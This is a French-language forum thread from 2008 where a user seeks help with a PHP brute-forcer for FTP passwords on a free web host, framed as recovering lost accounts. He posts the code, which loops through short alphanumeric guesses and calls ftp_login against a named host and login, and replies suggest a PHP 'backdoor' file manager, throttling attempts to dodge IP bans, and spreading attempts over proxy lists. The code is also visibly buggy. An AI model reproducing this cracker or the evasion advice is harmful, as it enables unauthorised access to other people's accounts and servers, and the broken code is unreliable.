Vous n'êtes pas identifié.
j'essaye de coder une page qui se connecte a un serveur d'hebergement web via le protocole FTP( port 21 ) garce a un user ID et password biensur, mais je n'y arrive pas, pouvez vous me fournir un code d'exemple pour prendre l'exemple ? marci d'avance ![]()

Salutation et bienvenu a toi l'ami !
Hm je vois ce que tu veux faire comme script ... Mais pourquoi ne pas utilisé un script de gestion de fichiers tout simplement, sous le principe d'une backdoor PHP mais protégé par htaccess ou autres ?
Sinon j'ai trouvé ce script assez intéressant je trouve ![]()
http://www.comscripts.com/scripts/php.p … .2041.html
Dis moi ce que tu en penses ![]()
bref => regarde là
c'est un cracker(brute forcer) en php ,je veu l'utiliser pour cracker les psw des comptes FTP perdu, et de pouvoir les reutiliser a nouveau, mais le brute forcing ne se genere plut quand j'ajoute mon code pour qu'il essaye les codes generé sur une host d'hebergement web gratuit via le protocle FTP (port 21)

Aie en effet, de plus il va s'arrêter tout seul avec le timeout PHP ![]()
Hm, t'as pas essayer de passer par un autre support que PHP ?
Parcque pour cracker un mot de passe perdu, c'est pas ce qui se fait de mieux quoi :s
au debut du code de ce cracker il ya le code suivant
set_time_limit(0);
mais je croi que ta raison psk le timeout vient de la configuration du serveur ![]()
apart ça ? ta aucune idée pour m'aider ?
Dernière modification par Kautsky (26-02-2008 14:47:48)

Wai le timeout se configure dans php.ini
; Default timeout for socket based streams (seconds) default_socket_timeout = 60
Sinon pour ton problème, je vois pas trop sur ce coup, je suis pas encore assez calé pour t'aider :s
Je vais demander a un potoss de me mettre sur la route, désolé la :s
Kautsky a écrit:
bref => regarde là
c'est un cracker(brute forcer) en php ,je veu l'utiliser pour cracker les psw des comptes FTP perdu, et de pouvoir les reutiliser a nouveau, mais le brute forcing ne se genere plut quand j'ajoute mon code pour qu'il essaye les codes generé sur une host d'hebergement web gratuit via le protocle FTP (port 21)
Doux rêve. Au premier ping le serveur t'a vu arriver avec ton algo brute forcer et ta quantité de tentatives (j'aimerai bien voir le code par curiosité, je le connais en C++ mais pas en php) et le serveur va te retirer la socket et bannir ton IP pour quelques minutes. Plus tu feras de tentatives, plus le banissement sera long.
Tu peux toujours essayer avec de l'Ajax (ajax pour rafraichir ta page), genre 1 tentative de connection toute les minutes. Tu gardes ton navigateur ouvert, et Ajax lance php toute les minutes qui lui fait 1 tentative de connection. Si la tentative reussi, le script t'envoi un email avec le code.
Reste a voir si le serveur avec 1500 tentatives par jour ne va pas bannir ton IP.
++
oui, mais en y penant pour craker un pass il doit bien falloir quelques millions de tentatives avant d'y arriver.
Tu peux nous montrer le bout de code php de brute forcer ? si c'est possible
le voilà
<?php
set_time_limit(0);
$pw = array ('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0');
$ok=1;
for ( $n=0; $n <= count($pw); $n++ )
{
$passwordb= $pw[$n];
openconnection($passwordb);
for ( $x = 0; $x <= count($pw); $x++)
{
$passwordb= $pw[$n];
$tt = $pw[$x];
$passwordb= $passwordb. $tt;
openconnection($trypassword);
for ( $z = 0; $z <= count($pw); $z++)
{
$passwordb= $pw[$n];
$tt = $pw[$x];
$tot = $pw[$z];
$passwordb= $passwordb. $tt.$tot;
sleep($ok);
for ( $t = 0; $t <= count($pw); $t++)
{
$passwordb= $pw[$n];
$tt = $pw[$x];
$tot = $pw[$z];
$tit = $pw[$t];
$passwordb= $passwordb. $tt.$tot.$tit;
for ( $s = 0; $s <= count($pw); $s++)
{
$passwordb= $pw[$n];
$tt = $pw[$x];
$tot = $pw[$z];
$tit = $pw[$t];
$sos = $pw[$s];
$passwordb= $passwordb. $tt.$tot.$tit.$sos;
for ( $u = 0; $u <= count($pw); $u++)
{
$passwordb= $pw[$n];
$tt = $pw[$x];
$tot = $pw[$z];
$tit = $pw[$t];
$sos = $pw[$s];
$usr = $pw[$u];
$passwordb= $passwordb. $tt.$tot.$tit.$sos.$usr;
}
}
}
}
}
}
function openconnection($passwordb)
{
echo $passwordb."<br>";
$serveur_distant = "kautsky.ifrance.com";
$port = "21";
$login = "kautsky_1";
$pass = $passwordb;
$conn_id = ftp_connect($serveur_distant, $port) or die('connection impossible à ' . $serveur_distant . '');
if (ftp_login($conn_id, $login, $pass))
{
$dossier_courant = ftp_pwd($conn_id);
echo 'un ftp tout chaud rien que pour toi, pass:' . $pass . ' login: ' . $login . '\n';
echo 'dossier courant: ' . $dossier_courant . '';
}
else
{
echo "sorry man but il y à une erreur d'authentification";
}
}
?>je me suis inspirer d'un code déja existant, mais je le trouve bordélique quand même ^^
Dernière modification par Kautsky (27-02-2008 20:00:04)

Bah wai le problème qui va se paser ici, c'est que tu vas devoir attendre des millions d'années avant de réussir a brute forcer ton pass ...
Moi j'avais pensé a autre chose, malheuresement le code doit vraiment pas être simple a codé, et ce n'est rien de le dire ... par contre ton brute force serait vraiment efficace.
Trouve toi des liste de proxy, un maximum possible, et créé un script PHP qui va faire envoyé t'as requete part chaque connexion proxy ...
Je sais pas trop si tu vois le principe ^^
envoyer les requettes (contenand le psw ) a partir d'autres serveurs ( proxys ), ce qui menera a gagner un grand nombre de temps qui depend de nombre de proxys utilisé. c ça ?!